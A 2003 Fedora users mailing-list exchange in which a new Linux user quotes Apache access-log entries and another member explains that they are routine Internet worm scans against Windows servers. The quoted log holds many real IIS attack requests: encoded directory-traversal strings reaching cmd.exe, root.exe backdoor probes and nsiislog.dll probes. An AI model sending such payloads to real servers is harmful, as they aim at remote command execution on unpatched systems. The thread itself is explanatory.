attacked? hacked? help.....!

Mike Klinke lsomike at futzin.com
Tue Dec 9 05:38:41 UTC 2003 

On Tuesday 09 December 2003 05:26, Lisa Durham wrote:
> I am very new to Linux but was poking around in my newly setup Fedora
> Core 1 system today and came upon the lines below in the Apache
> Access Log when I used the "System Logs" icon in the System Tools
> Menu.
>
> Is the IP at the beginning of each line the IP that requested the
> file that is shown at the end of the line? with the date and time in
> the center? If this isn't what's shown in this file, what is this
> format? What does this file tell me? Am I paranoid, or was someone
> trying to access my machine (but ignorantly assuming it was a Windows
> machine)?
>
>
> quoted Apaches Access Log:
>
> 24.60.93.48 - - [07/Dec/2003:14:39:47 -0600] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 327 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:39:47 -0600] "GET
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:39:47 -0600] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:39:48 -0600] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:39:48 -0600] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349
> "-" "-" 24.60.93.48 - - [07/Dec/2003:14:39:48 -0600] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 366 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:39:49 -0600] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 366 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:39:49 -0600] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../w
>innt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:39:52 -0600] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348
> "-" "-" 24.60.93.48 - - [07/Dec/2003:14:39:56 -0600] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348
> "-" "-" 24.60.93.48 - - [07/Dec/2003:14:39:56 -0600] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348
> "-" "-" 24.60.93.48 - - [07/Dec/2003:14:40:17 -0600] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348
> "-" "-" 24.60.93.48 - - [07/Dec/2003:14:40:18 -0600] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339
> "-" "-" 24.60.93.48 - - [07/Dec/2003:14:40:18 -0600] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339
> "-" "-" 24.60.93.48 - - [07/Dec/2003:14:40:19 -0600] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
> 349 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:40:19 -0600] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349
> "-" "-" 211.239.107.43 - - [07/Dec/2003:15:40:29 -0600] "GET
> /scripts/nsiislog.dll" 404 331 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 327 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349
> "-" "-" 24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 366 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 366 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../w
>innt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348
> "-" "-" 24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348
> "-" "-" 24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348
> "-" "-" 24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348
> "-" "-" 24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339
> "-" "-" 24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339
> "-" "-" 24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
> 349 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349
> "-" "-" 217.120.149.161 - - [07/Dec/2003:18:27:17 -0600] "GET
> /scripts/nsiislog.dll" 404 331 "-" "-"
>
> ----------------------------------------
>
> Thanks,
> Lisa


This is normal. What you're seeing is Internet worm scans looking to 
break into vulnerable Windows systems. 

Regards,  Mike Klinke

More information about the users mailing list